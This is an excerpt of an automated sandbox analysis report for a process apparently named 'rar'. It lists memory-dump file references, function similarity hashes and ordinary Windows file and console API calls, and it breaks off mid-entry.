                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4141822043-0
                                                                                                                                                                                                                                                • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                                • Instruction ID: ac24ca338752e0f4e8e21379bc6740fde72a87b27b7c4a2db9773b3c299c900e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60E0C224F2861353FFA84731B8651784251DF7DB80F601074F80FCA350EE2DD4898300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                • Instruction ID: bfad871db795b648586c4a2a0933437805fa0a16156b6f1ecfbee3d351f8605f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26E09224E24B6582EA54AB75A95537913526F74741F20543CFC0E863E3CE3DA84D9350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4052775200-0
                                                                                                                                                                                                                                                • Opcode ID: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
                                                                                                                                                                                                                                                • Instruction ID: 2dfe562cf5b0a5fbc5c85fed3e087d3baefc20bef9c7c1d403deaa7232d6d673
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE1F722E18AA285EB368F60D4201BD67A1FB60790F644531FBAD877D9EF7DD481C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF60E5D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF60E5D7C48), ref: 00007FF60E5E1B8D
                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF60E5D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF60E5D7C48), ref: 00007FF60E5E1BD7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                                • Instruction ID: 772afb983c42c498b4fa5dcbcacceb23078ffc0e8f6dd6ec4310f71698080fe2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7315363A28A9546F7718F20E4143B926A0EB60BB8F204334FEAC873C5EF7DC4858700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 932687459-0
                                                                                                                                                                                                                                                • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                • Instruction ID: 22dcd2026b9895c566e60ecab5102c280ccf8b86f8be916925de34dbb2b303b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E215453A18E9582EB01CF29D5610B86360FBACF88B18A725EF5D43656EF28E5E5C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 40d17529f56f4ffcfc3be8fdb8ce4568d85ee55ceb8ce58a21b5fc4023b9d816
                                                                                                                                                                                                                                                • Instruction ID: a295dd522f0a3738dcc60ff30b38444a587a1b3be0ef7c0db1f2da6e67cdb52e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40d17529f56f4ffcfc3be8fdb8ce4568d85ee55ceb8ce58a21b5fc4023b9d816
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F111B63190AF9181EB16EB94A5103B972A4EFA47D0F380A38F69D877E6DE7DD151C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                                • Instruction ID: 0c4a1b6afd2475698ecc17734d88dff12d75994544638167d8e2a427f7adb635
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5012925E19AB142EA6D4B26A5104386355EF64BF0F345B30FA2D83BE8DE3ED4418700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • setbuf.LIBCMT ref: 00007FF60E5D7A7B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E622AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60E627EF3
                                                                                                                                                                                                                                                • setbuf.LIBCMT ref: 00007FF60E5D7A8F
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5D7B44: GetStdHandle.KERNEL32(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B4A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5D7B44: GetFileType.KERNELBASE(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B56
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5D7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B69
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E622ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60E622AD0
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E622B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60E622C1C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4044681568-0
                                                                                                                                                                                                                                                • Opcode ID: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                                • Instruction ID: b3ad6e42aaf55abcd4f60ccf2828eb00aec237998863148f08a95aea8056a465
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52012500E2E5A206FA29B3B574B23B958428FB5314F20853EF41D8A7E3DD1D6806A311
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                • Instruction ID: 897fef7a6470152b22f38607112df888e3f6c5ac089d1a0c5fae95cd4c2a052d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12018E36A18B9282EB69AB29E4543686360EB60778F344B31F13D812F9DF3DD586C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000800,00007FF60E5E305D,?,?,?,?,?,?,?,?,00007FF60E5F4126,?,?,?,?,00000800), ref: 00007FF60E5E30F0
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF60E5F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF60E5E3119
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                                • Instruction ID: f96c3b49a203226d4850265b125aa996a2e649032aa4c1fe9c7322469c6a0d5f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17F0C221B28A9182EAA09BA4F4543B963A0BF5C7D4F500531FA9CC379ADF6CD5849B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1175261203-0
                                                                                                                                                                                                                                                • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
